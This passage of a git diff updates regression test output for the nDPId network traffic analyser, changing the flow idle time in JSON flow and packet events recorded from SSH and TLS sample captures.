-00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": 
{"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} -01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server 
Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} -01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} -01109{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete 
Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} -00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} 
+00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1320435464760,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1320435464760,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAABAek9AAEAGi52sEO4BrBDuqOQbABY3Xn+qAAAAALAC\/\/+abgAAAgQFtAEDAwMBAQgKHJWv9QAAAAAEAgAA"} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1320435464760,"pkt":"AFBWwAAIAAwppUXgCABFAAA8AABAAEAGBfGsEO6orBDuAQAW5BtConY2N15\/q6ASFqC42wAAAgQFtAQCCAoAEyL4HJWv9QEDAwY="} 
+00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1320435464760,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1320435464760,"pkt":"AAwppUXgAFBWwAAICABFAAA0xzVAAEAGPsOsEO4BrBDuqOQbABY3Xn+rQqJ2N4AQ\/\/\/+RgAAAQEIChyVr\/UAEyL4"} +00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +00892{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":5,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":21,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client 
Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"","hassh_client":"","hassh_server":""}} +01038{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1320435464760,"flow_last_seen":1320435464768,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":21,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1320435464768,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"","hassh_server":""}} +01074{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1320435464760,"flow_last_seen":1320435464769,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":946,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1320435464769,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": 
{"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":""}} +01109{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1320435464760,"flow_last_seen":1320435464770,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":904,"flow_tot_l4_payload_len":1730,"flow_avg_l4_payload_len":173,"midstream":0,"thread_ts_msec":1320435464770,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"},"ssh": {"client_signature":"SSH-2.0-OpenSSH_5.3","server_signature":"SSH-2.0-OpenSSH_5.6","hassh_client":"21B457A327CE7A2D4FCE5EF2C42400BD","hassh_server":"B1C6C0D56317555B85C7005A3DE29325"}} 
+00951{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":258,"flow_first_seen":1320435464760,"flow_last_seen":1320435713237,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1280,"flow_tot_l4_payload_len":18498,"flow_avg_l4_payload_len":71,"midstream":0,"thread_ts_msec":1320435713237,"l3_proto":"ip4","src_ip":"172.16.238.1","dst_ip":"172.16.238.168","src_port":58395,"dst_port":22,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"18": {"risk":"SSH Obsolete Client Version\/Cipher","severity":"High","risk_score": {"total":500,"client":350,"server":150}},"19": {"risk":"SSH Obsolete Server Version\/Cipher","severity":"Medium","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"SSH","breed":"Acceptable","category":"RemoteAccess"}} 00553{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":258,"source":"ssh.pcap","alias":"nDPId-test","packets-captured":258,"packets-processed":258,"total-skipped-flows":0,"total-l4-data-len":18498,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":4,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":13,"global_ts_msec":1320435713237} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 258/258 diff --git a/test/results/ssl-cert-name-mismatch.pcap.out b/test/results/ssl-cert-name-mismatch.pcap.out index 12705277f..9d7d3a11f 100644 --- a/test/results/ssl-cert-name-mismatch.pcap.out +++ b/test/results/ssl-cert-name-mismatch.pcap.out 
@@ -1,13 +1,13 @@ 00473{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1620643422034} -00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620643422034,"flow_last_seen":1620643422034,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620643422034,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="} -00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"} 
-00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} -00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} 
-01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas Garron Torres, CN=*.badssl.com","alpn":"http\/1.1","fingerprint":"18:45:B2:16:EF:D0:83:9A:18:51:A9:57:32:5D:A3:36:21:70:49:CB"}} -00708{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":21,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1620643422034,"flow_last_seen":1620643422754,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":4010,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1620643422754,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"}} 
+00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1620643422034,"flow_last_seen":1620643422034,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1620643422034,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1620643422034,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422034,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA8gCNAAEAGNQ\/AqALeaJpZadX0AbtP8LY3AAAAAKACchCFuAAAAgQFtAQCCAoBlw8kAAAAAAEDAwc="} +00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1620643422162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1620643422162,"pkt":"ACWQ1Mz5BBjWBrNaCABFAAA8AABAADAGxTJomllpwKgC3gG71fRoLFRgT\/C2OKASbgBjmAAAAgQFjAQCCAqtfZhXAZcPJAEDAwc="} 
+00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1620643422162,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1620643422162,"pkt":"BBjWBrNaACWQ1Mz5CABFAAA0gCRAAEAGNRbAqALeaJpZadX0AbtP8LY4aCxUYYAQAOWFsAAAAQEICgGXD0StfZhX"} +00872{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1620643422034,"flow_last_seen":1620643422196,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":245,"flow_tot_l4_payload_len":245,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1620643422196,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}} +00929{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":1653,"flow_avg_l4_payload_len":275,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}} +01207{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":10,"source":"ssl-cert-name-mismatch.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1620643422034,"flow_last_seen":1620643422325,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1408,"flow_tot_l4_payload_len":3579,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":1620643422325,"l3_proto":"ip4","src_ip":"192.168.2.222","dst_ip":"104.154.89.105","src_port":54772,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleCloud","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"wrong.host.badssl.com","server_names":"*.badssl.com,badssl.com","ja3":"4e69e4e5627c5e4c2846ba3e64d23fb9","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA","subjectDN":"C=US, ST=California, L=Walnut Creek, O=Lucas 